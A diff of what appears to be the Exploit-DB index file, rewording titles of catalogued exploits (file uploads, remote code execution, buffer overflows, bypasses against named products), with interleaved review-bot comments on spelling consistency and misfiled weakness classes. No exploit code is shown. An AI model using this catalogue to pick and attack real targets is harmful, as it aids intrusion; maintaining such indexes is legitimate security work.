-23651,platforms/php/remote/23651.rb,"WordPress WP-Property Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0
-23652,platforms/php/remote/23652.rb,"WordPress Asset-Manager Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0
+23651,platforms/php/remote/23651.rb,"WordPress WP-Property Plugin - Arbitrary .PHP File Upload",2012-12-25,Metasploit,php,remote,0
+23652,platforms/php/remote/23652.rb,"WordPress Asset-Manager Plugin - Arbitrary .PHP File Upload",2012-12-25,Metasploit,php,remote,0
 23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0
 23654,platforms/windows/dos/23654.txt,"XLight FTP Server 1.x - Long Directory Request Remote Denial of Service",2004-02-05,intuit,windows,dos,0
 23655,platforms/bsd/local/23655.txt,"BSD Kernel - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0
@@ -20941,7 +20941,7 @@ id,file,description,date,author,platform,type,port
 23732,platforms/windows/remote/23732.c,"PSOProxy 0.91 - Remote Buffer Overflow (1)",2004-02-20,PaLbOsA,windows,remote,0
 23733,platforms/windows/remote/23733.c,"PSOProxy 0.91 - Remote Buffer Overflow (2)",2004-02-20,Li0n7,windows,remote,0
 23734,platforms/windows/remote/23734.c,"PSOProxy 0.91 - Remote Buffer Overflow (3)",2004-02-20,NoRpiuS,windows,remote,0
-23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Remote Post-Authentication Root Command Execution",2012-12-29,xistence,hardware,remote,0
+23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Remote Authenticated Root Command Execution",2012-12-29,xistence,hardware,remote,0
 23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W - ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0
 23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0
 23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,linux,local,0
@@ -20956,7 +20956,7 @@ id,file,description,date,author,platform,type,port
 23747,platforms/php/webapps/23747.txt,"XMB Forum 1.8 - BBcode align Tag Cross-Site Scripting",2004-02-23,"Janek Vind",php,webapps,0
 23748,platforms/php/webapps/23748.txt,"XMB Forum 1.8 - forumdisplay.php Multiple Parameter SQL Injection",2004-02-23,"Janek Vind",php,webapps,0
 23749,platforms/php/webapps/23749.txt,"LiveJournal 1.1 - CSS HTML Injection",2004-02-23,"Michael Scovetta",php,webapps,0
-23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Pre-Authentication Command Denial of Service",2004-02-24,"Zone-h Security Team",php,dos,0
+23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Unauthenticated Command Denial of Service",2004-02-24,"Zone-h Security Team",php,dos,0
 23751,platforms/windows/remote/23751.txt,"Apache Cygwin 1.3.x/2.0.x - Directory Traversal",2004-02-24,"Jeremy Bae",windows,remote,0
 23752,platforms/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service",2004-02-24,"Luigi Auriemma",windows,dos,0
 23753,platforms/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 - 'PHPtest.php' Full Path Disclosure",2004-02-24,"Rafel Ivgi",php,webapps,0
@@ -20995,8 +20995,8 @@ id,file,description,date,author,platform,type,port
 23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer - CButton Object Use-After-Free",2013-01-02,Metasploit,windows,remote,0
 23786,platforms/hardware/dos/23786.c,"Nortel Wireless LAN Access Point 2200 Series - Denial of Service",2004-03-02,"Alex Hernandez",hardware,dos,0
 23787,platforms/multiple/dos/23787.txt,"1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow",2004-03-02,JeFFOsZ,multiple,dos,0
-23788,platforms/hardware/dos/23788.pl,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (1)",2004-03-02,"Vasco Costa",hardware,dos,0
-23789,platforms/hardware/dos/23789.c,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (2)",2004-03-02,shaun2k2,hardware,dos,0
+23788,platforms/hardware/dos/23788.pl,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (1)",2004-03-02,"Vasco Costa",hardware,dos,0
+23789,platforms/hardware/dos/23789.c,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (2)",2004-03-02,shaun2k2,hardware,dos,0
 23790,platforms/windows/remote/23790.htm,"Microsoft Internet Explorer 5 - window.open Search Pane Cross-Zone Scripting",2003-09-10,"Liu Die Yu",windows,remote,0
 23791,platforms/asp/webapps/23791.txt,"SpiderSales 2.0 Shopping Cart - Multiple Vulnerabilities",2004-03-03,"Nick Gudov",asp,webapps,0
 23792,platforms/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x - Multiple Module Cross-Site Scripting Vulnerabilities",2004-03-05,"Rafel Ivgi The-Insider",php,webapps,0
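Review bot: Rows 23788 and 23789 switch `Authorization` to the British spelling `Authorisation`, while the rest of the index stays American: `Unauthorized` in row 24164, and `Authorization Bypass` on the old side of other hunks in this patch. The description column is what people search when matching an advisory to an entry, so a case-insensitive search for "authorization" will now miss these two rows. Keep one spelling across the file, e.g. `Malformed Web Authorization Request Denial of Service (1)`, or apply the new spelling everywhere in the same commit.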
@@ -21220,7 +21220,7 @@ id,file,description,date,author,platform,type,port
 24021,platforms/windows/remote/24021.rb,"Honeywell Tema Remote Installer - ActiveX Remote Code Execution",2013-01-10,Metasploit,windows,remote,0
 24022,platforms/windows/dos/24022.txt,"Nero MediaHome 4.5.8.0 - Denial of Service",2013-01-10,"High-Tech Bridge SA",windows,dos,0
 24023,platforms/hardware/dos/24023.py,"Colloquy 1.3.5 / 1.3.6 - Denial of Service",2013-01-10,UberLame,hardware,dos,0
-24024,platforms/windows/remote/24024.html,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload and Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0
+24024,platforms/windows/remote/24024.html,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload / Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0
 24025,platforms/windows/remote/24025.txt,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Information Disclosure",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0
 24026,platforms/php/webapps/24026.txt,"phpBB 2.0.x - album_portal.php Remote File Inclusion",2004-04-19,Officerrr,php,webapps,0
 24027,platforms/linux/local/24027.txt,"UTempter 0.5.x - Multiple Local Vulnerabilities",2004-04-19,"Steve Grubb",linux,local,0
@@ -21357,7 +21357,7 @@ id,file,description,date,author,platform,type,port
 24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - showperf.asp title Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
 24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - showini.asp Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0
 24164,platforms/cgi/webapps/24164.txt,"Rit Research Labs TinyWeb 1.9.2 - Unauthorized Script Disclosure",2004-06-01,"Ziv Kamir",cgi,webapps,0
-24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0
+24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0
 24166,platforms/php/webapps/24166.txt,"PHP-Nuke 5.x/6.x/7.x - Direct Script Access Security Bypass",2004-06-01,Squid,php,webapps,0
 24167,platforms/php/webapps/24167.txt,"SquirrelMail 1.2.x - From Email Header HTML Injection",2004-06-03,anonymous,php,webapps,0
 24168,platforms/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX - Script Settings Parameter Remote PHP File Inclusion",2004-06-03,"The Warlock [BhQ]",php,webapps,0
@@ -21393,7 +21393,7 @@ id,file,description,date,author,platform,type,port
 24202,platforms/hardware/webapps/24202.txt,"linksys wrt54gl firmware 4.30.15 build 2 - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0
 24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0
 24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Root/SYSTEM Exploit",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0
-24205,platforms/linux/remote/24205.txt,"Novell NCP - Pre-Authentication Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0
+24205,platforms/linux/remote/24205.txt,"Novell NCP - Unauthenticated Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0
 24230,platforms/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure",2004-06-22,"Konstantin V. Gavrilenko",hardware,remote,0
 24206,platforms/multiple/remote/24206.rb,"Jenkins CI Script Console - Command Execution (Metasploit)",2013-01-18,"Spencer McIntyre",multiple,remote,0
 24207,platforms/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Exploit",2013-01-18,"Jon Bailey",windows,local,0
@@ -21491,7 +21491,7 @@ id,file,description,date,author,platform,type,port
 24299,platforms/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0
 24300,platforms/asp/webapps/24300.pl,"Leigh Business Enterprises Web HelpDesk 4.0 - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0
 24301,platforms/php/webapps/24301.html,"Mensajeitor Tag Board 1.x - Authentication Bypass",2004-07-21,"Jordi Corrales",php,webapps,0
-24302,platforms/asp/webapps/24302.pl,"Polar Helpdesk 3.0 - Cookie Based Authentication System Bypass",2004-07-21,"Noam Rathaus",asp,webapps,0
+24302,platforms/asp/webapps/24302.pl,"Polar Helpdesk 3.0 - Cookie Based Authentication Bypass",2004-07-21,"Noam Rathaus",asp,webapps,0
 24303,platforms/php/webapps/24303.txt,"Layton Technology HelpBox 3.0.1 - Multiple SQL Injections",2004-07-21,"Noam Rathaus",php,webapps,0
 24304,platforms/windows/remote/24304.txt,"Imatix Xitami 2.5 - Server Side Includes Cross-Site Scripting",2004-07-22,"Oliver Karow",windows,remote,0
 24305,platforms/multiple/dos/24305.txt,"PSCS VPOP3 2.0 - Email Server Remote Denial of Service",2004-07-22,dr_insane,multiple,dos,0
@@ -21659,7 +21659,7 @@ id,file,description,date,author,platform,type,port
 24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
 24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
 24479,platforms/windows/remote/24479.py,"Freefloat FTP 1.0 - Raw Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0
-24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - (Post-Authentication) Remote Command Execution",2013-02-11,aeon,php,webapps,0
+24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - (Authenticated) Remote Command Execution",2013-02-11,aeon,php,webapps,0
 24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x / 5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0
 24483,platforms/hardware/webapps/24483.txt,"TP-Link Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0
 24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0
@@ -21669,7 +21669,7 @@ id,file,description,date,author,platform,type,port
 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - (install.php) Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0
 24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php id Parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0
 24490,platforms/windows/remote/24490.rb,"Novell Groupwise Client - gwcls1.dll ActiveX Remote Code Execution",2013-02-12,Metasploit,windows,remote,0
-24494,platforms/hardware/remote/24494.rb,"Polycom HDX - Telnet Authorization Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23
+24494,platforms/hardware/remote/24494.rb,"Polycom HDX - Telnet Authentication Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23
 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - (ofc_upload_image.php) Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0
 24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)",2013-02-14,"Scott Bell",windows,remote,0
 24496,platforms/windows/webapps/24496.txt,"SonicWALL Scrutinizer 9.5.2 - SQL Injection",2013-02-14,Vulnerability-Lab,windows,webapps,0
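Review bot: Renaming `Telnet Authorization Bypass` to `Telnet Authentication Bypass` in row 24494 changes the weakness class the entry is filed under, not only its wording. The same substitution is applied to row 28208 (FlexWATCH AIndex.asp) and row 30661 (Google Urchin Report.cgi) in later hunks. A missing identity check and a missing permission check for an already-identified user are triaged and mitigated differently, and nothing in the diff shows that each advisory was re-read before the bulk rename. Confirm each row against its referenced file, and keep `Authorization Bypass` where the report describes an access-control gap rather than a login bypass.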
@@ -21694,7 +21694,7 @@ id,file,description,date,author,platform,type,port
 24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 - Download Execute",2013-02-20,g11tch,windows,remote,0
 24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,Metasploit,windows,remote,0
 24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,Metasploit,windows,remote,0
-24529,platforms/php/remote/24529.rb,"OpenEMR - PHP File Upload",2013-02-20,Metasploit,php,remote,0
+24529,platforms/php/remote/24529.rb,"OpenEMR - Arbitrary .PHP File Upload",2013-02-20,Metasploit,php,remote,0
 24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0
 24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)",2013-02-23,Metasploit,windows,remote,0
 24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script - (Authentication Bypass) SQL Injection",2013-02-21,"cr4wl3r ",php,webapps,0
@@ -21711,7 +21711,7 @@ id,file,description,date,author,platform,type,port
 24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0
 24547,platforms/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload",2013-02-26,Metasploit,php,remote,0
 24548,platforms/php/remote/24548.rb,"Glossword 1.8.8 & 1.8.12 - Arbitrary File Upload",2013-02-26,Metasploit,php,remote,0
-24549,platforms/php/remote/24549.rb,"PolarPearCMS - PHP File Upload",2013-02-26,Metasploit,php,remote,0
+24549,platforms/php/remote/24549.rb,"PolarPearCMS - Arbitrary .PHP File Upload",2013-02-26,Metasploit,php,remote,0
 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0
 24551,platforms/php/webapps/24551.txt,"Joomla! 3.0.2 - (highlight.php) PHP Object Injection",2013-02-27,EgiX,php,webapps,0
 24552,platforms/php/webapps/24552.txt,"WordPress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0
@@ -21752,7 +21752,7 @@ id,file,description,date,author,platform,type,port
 24587,platforms/php/webapps/24587.txt,"PostNuke Modules Factory Subjects Module 2.0 - SQL Injection",2004-09-10,Criolabs,php,webapps,0
 24588,platforms/asp/webapps/24588.txt,"GetSolutions GetIntranet 2.2 - Multiple Remote Input Validation Vulnerabilities",2004-09-10,Criolabs,asp,webapps,0
 24589,platforms/asp/webapps/24589.txt,"GetSolutions GetInternet - Multiple SQL Injections",2004-09-10,Criolabs,asp,webapps,0
-24590,platforms/linux/dos/24590.txt,"Apache 2.0.x - mod_ssl Remote Denial of Service",2004-09-10,"M. ""Alex"" Hankins",linux,dos,0
+24590,platforms/linux/dos/24590.txt,"Apache/mod_ssl 2.0.x - Remote Denial of Service",2004-09-10,"M. ""Alex"" Hankins",linux,dos,0
 24591,platforms/cgi/webapps/24591.txt,"PerlDesk Language Variable - Server-Side Script Execution",2004-09-13,"Nikyt0x Argentina",cgi,webapps,0
 24592,platforms/multiple/dos/24592.txt,"Pingtel Xpressa 1.2.x/2.0/2.1 - Handset Remote Denial of Service",2004-09-13,@stake,multiple,dos,0
 24593,platforms/unix/dos/24593.txt,"QNX Photon phrelay-cfg - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0
@@ -22315,7 +22315,7 @@ id,file,description,date,author,platform,type,port
 25158,platforms/php/webapps/25158.txt,"OOApp Guestbook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps,0
 25159,platforms/jsp/webapps/25159.txt,"cyclades alterpath manager 1.1 - Multiple Vulnerabilities",2005-02-24,sullo@cirt.net,jsp,webapps,0
 25160,platforms/php/webapps/25160.txt,"PunBB 3.0/3.1 - Multiple Remote Input Validation Vulnerabilities",2005-02-24,"John Gumbel",php,webapps,0
-25161,platforms/php/webapps/25161.txt,"phpWebSite 0.x - Image File Processing Arbitrary PHP File Upload",2005-02-24,tjomka,php,webapps,0
+25161,platforms/php/webapps/25161.txt,"phpWebSite 0.x - Image File Processing Arbitrary .PHP File Upload",2005-02-24,tjomka,php,webapps,0
 25162,platforms/php/webapps/25162.txt,"CubeCart 2.0.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-25,Lostmon,php,webapps,0
 25163,platforms/windows/remote/25163.txt,"CIS WebServer 3.5.13 - Directory Traversal",2005-02-25,CorryL,windows,remote,0
 25164,platforms/linux/dos/25164.txt,"Gaim 1.1.3 - File Download Denial of Service",2005-02-25,"Randall Perry",linux,dos,0
@@ -22394,7 +22394,7 @@ id,file,description,date,author,platform,type,port
 25250,platforms/php/webapps/25250.txt,"OpenDocMan 1.2.6.5 - Persistent Cross-Site Scripting",2013-05-06,drone,php,webapps,0
 25251,platforms/hardware/webapps/25251.txt,"D-Link DSL-320B - Multiple Vulnerabilities",2013-05-06,m-1-k-3,hardware,webapps,0
 25252,platforms/asp/webapps/25252.txt,"BetaParticle blog 2.0/3.0 - dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",asp,webapps,0
-25253,platforms/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated File Upload",2005-03-21,"farhad koosha",asp,webapps,0
+25253,platforms/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated Arbitrary File Upload",2005-03-21,"farhad koosha",asp,webapps,0
 25254,platforms/asp/webapps/25254.txt,"BetaParticle blog 2.0/3.0 - myFiles.asp Unauthenticated File Manipulation",2005-03-21,"farhad koosha",asp,webapps,0
 25255,platforms/windows/dos/25255.txt,"FUN labs Game Engine - Multiple Remote Denial of Service Vulnerabilities",2005-03-20,"Luigi Auriemma",windows,dos,0
 25256,platforms/osx/local/25256.c,"Apple Mac OSX 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0
@@ -22465,7 +22465,7 @@ id,file,description,date,author,platform,type,port
 25322,platforms/linux/dos/25322.c,"Linux Kernel 2.6.10 - File Lock Local Denial of Service",2005-03-30,ChoiX,linux,dos,0
 25323,platforms/php/webapps/25323.txt,"InterAKT Online MX Shop 1.1.1 - SQL Injection",2005-03-31,Dcrab,php,webapps,0
 25324,platforms/asp/webapps/25324.txt,"ASP-DEV XM Forum RC3 - IMG Tag Script Injection",2005-03-31,Zinho,asp,webapps,0
-25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 - Object Push Service BlueTooth File Upload Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0
+25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 - Object Push Service BlueTooth Arbitrary File Upload / Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0
 25326,platforms/windows/dos/25326.txt,"RUMBA 7.3/7.4 - Profile Handling Multiple Buffer Overflow Vulnerabilities",2005-04-01,"Bahaa Naamneh",windows,dos,0
 25327,platforms/php/webapps/25327.txt,"Alstrasoft EPay Pro 2.0 - Remote File Inclusion",2005-04-01,Dcrab,php,webapps,0
 25328,platforms/php/webapps/25328.txt,"Alstrasoft EPay Pro 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-04-01,Dcrab,php,webapps,0
@@ -23548,7 +23548,7 @@ id,file,description,date,author,platform,type,port
 26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 - htpasswd Module 'Username' Command Execution",2013-06-24,Metasploit,linux,remote,0
 26420,platforms/windows/remote/26420.rb,"HP System Management Homepage - JustGetSNMPQueue Command Injection",2013-06-24,Metasploit,windows,remote,2381
 26421,platforms/php/remote/26421.rb,"LibrettoCMS File Manager - Arbitrary File Upload",2013-06-24,Metasploit,php,remote,0
-26422,platforms/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal File Upload",2013-06-24,Metasploit,linux,remote,0
+26422,platforms/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal Arbitrary File Upload",2013-06-24,Metasploit,linux,remote,0
 26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 - Bug_sponsorship_list_view_inc.php File Inclusion",2005-10-26,"Andreas Sandblad",php,webapps,0
 26424,platforms/windows/remote/26424.txt,"Snoopy 0.9x/1.0/1.2 - Arbitrary Command Execution",2005-10-26,"D. Fabian",windows,remote,0
 26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x - Info-DB Info_db.php Multiple SQL Injection",2005-10-26,admin@batznet.com,php,webapps,0
@@ -24793,7 +24793,7 @@ id,file,description,date,author,platform,type,port
 27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 - imessage.cgi 'Username' Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0
 27697,platforms/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 - login.cgi Password Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0
 28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0
-28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Pre-Authentication Heap Corruption",2013-09-03,kingcope,hardware,remote,0
+28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Unauthenticated Heap Corruption",2013-09-03,kingcope,hardware,remote,0
 28057,platforms/php/webapps/28057.txt,"Cline Communications - Multiple SQL Injections",2006-06-17,Liz0ziM,php,webapps,0
 28058,platforms/php/webapps/28058.txt,"Eduha Meeting - 'index.php' Arbitrary File Upload",2006-06-19,Liz0ziM,php,webapps,0
 28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x - Web Interface ccmadmin/phonelist.asp pattern Parameter Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0
@@ -25012,7 +25012,7 @@ id,file,description,date,author,platform,type,port
 27911,platforms/php/webapps/27911.txt,"vCard 2.9 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,black-code,php,webapps,0
 27912,platforms/php/webapps/27912.txt,"CoolPHP - 'index.php' Cross-Site Scripting",2006-05-27,black-code,php,webapps,0
 27913,platforms/asp/webapps/27913.txt,"Mini-NUKE 2.3 - Your_Account.asp Multiple SQL Injection",2006-05-29,"Mustafa Can Bjorn",asp,webapps,0
-27914,platforms/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - Remote Pre-Authentication IMAP Buffer Overflow",2006-05-29,kcope,windows,dos,0
+27914,platforms/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - Remote Unauthenticated IMAP Buffer Overflow",2006-05-29,kcope,windows,dos,0
 27915,platforms/multiple/dos/27915.pl,"Apache James 2.2 - SMTP Denial of Service",2006-05-29,y3dips,multiple,dos,0
 27916,platforms/php/webapps/27916.txt,"Photoalbum B&W 1.3 - 'index.php' Cross-Site Scripting",2006-05-29,black-code,php,webapps,0
 27917,platforms/php/webapps/27917.txt,"TikiWiki 1.9 - tiki-lastchanges.php Multiple Parameter Cross-Site Scripting",2006-05-29,Blwood,php,webapps,0
@@ -25268,7 +25268,7 @@ id,file,description,date,author,platform,type,port
 28205,platforms/php/webapps/28205.txt,"FlexWATCH Network Camera - Cross-Site Scripting",2006-06-11,"Jaime Blasco",php,webapps,0
 28206,platforms/php/webapps/28206.txt,"Fantastic Guestbook 2.0.1 - Guestbook.php HTML Injection",2006-07-11,omnipresent,php,webapps,0
 28207,platforms/windows/dos/28207.txt,"Microsoft Internet Explorer 6 - TriEditDocument Denial of Service",2006-07-11,hdm,windows,dos,0
-28208,platforms/asp/webapps/28208.txt,"FlexWATCH 3.0 - AIndex.asp Authorization Bypass",2006-07-12,"Jaime Blasco",asp,webapps,0
+28208,platforms/asp/webapps/28208.txt,"FlexWATCH 3.0 - AIndex.asp Authentication Bypass",2006-07-12,"Jaime Blasco",asp,webapps,0
 28209,platforms/multiple/remote/28209.txt,"FLV Players 8 - player.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0
 28210,platforms/multiple/remote/28210.txt,"FLV Players 8 - popup.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0
 28211,platforms/php/webapps/28211.txt,"Lazarus Guestbook 1.6 - codes-english.php show Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0
@@ -25390,8 +25390,8 @@ id,file,description,date,author,platform,type,port
 28333,platforms/unix/remote/28333.rb,"D-Link Devices - UPnP SOAP TelnetD Command Execution",2013-09-17,Metasploit,unix,remote,49152
 28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack - Arbitrary Command Execution",2013-09-17,Metasploit,linux,remote,443
 28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security - Privilege Escalation",2013-09-17,Metasploit,windows,local,0
-28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload",2013-09-17,Metasploit,windows,remote,443
-28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC - UpdateCertificatesServlet File Upload",2013-09-17,Metasploit,windows,remote,443
+28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet Arbitrary File Upload",2013-09-17,Metasploit,windows,remote,443
+28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC - UpdateCertificatesServlet Arbitrary File Upload",2013-09-17,Metasploit,windows,remote,443
 28338,platforms/linux/dos/28338.txt,"Vino VNC Server 3.7.3 - Persistent Denial of Service",2013-09-17,"Trustwave's SpiderLabs",linux,dos,5900
 28339,platforms/asp/webapps/28339.txt,"Anychart 3.0 - Password Parameter SQL Injection",2006-08-03,sCORPINo,asp,webapps,0
 28340,platforms/multiple/webapps/28340.c,"PSWD.JS - Insecure Password Hash",2006-08-03,"Gianstefano Monni",multiple,webapps,0
@@ -26131,7 +26131,7 @@ id,file,description,date,author,platform,type,port
 29090,platforms/asp/webapps/29090.txt,"Active News Manager - activeNews_comments.asp articleId Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0
 29091,platforms/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution (Remote Code Execution)",2013-10-20,"Halim Cruzito",php,webapps,0
 29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - search.asp search Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0
-29211,platforms/php/webapps/29211.txt,"WordPress Curvo Themes - Cross-Site Request Forgery File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0
+29211,platforms/php/webapps/29211.txt,"WordPress Curvo Themes - Cross-Site Request Forgery / Arbitrary File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0
 29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds - ad.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0
 29093,platforms/asp/webapps/29093.txt,"Texas Rankem - player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
 29094,platforms/asp/webapps/29094.txt,"Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
@@ -26561,7 +26561,7 @@ id,file,description,date,author,platform,type,port
 29522,platforms/php/webapps/29522.py,"WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure",2007-01-24,"Blake Matheny",php,webapps,0
 29523,platforms/osx/dos/29523.txt,"Apple Mac OSX 10.4.x - Software Update Format String",2007-01-25,kf,osx,dos,0
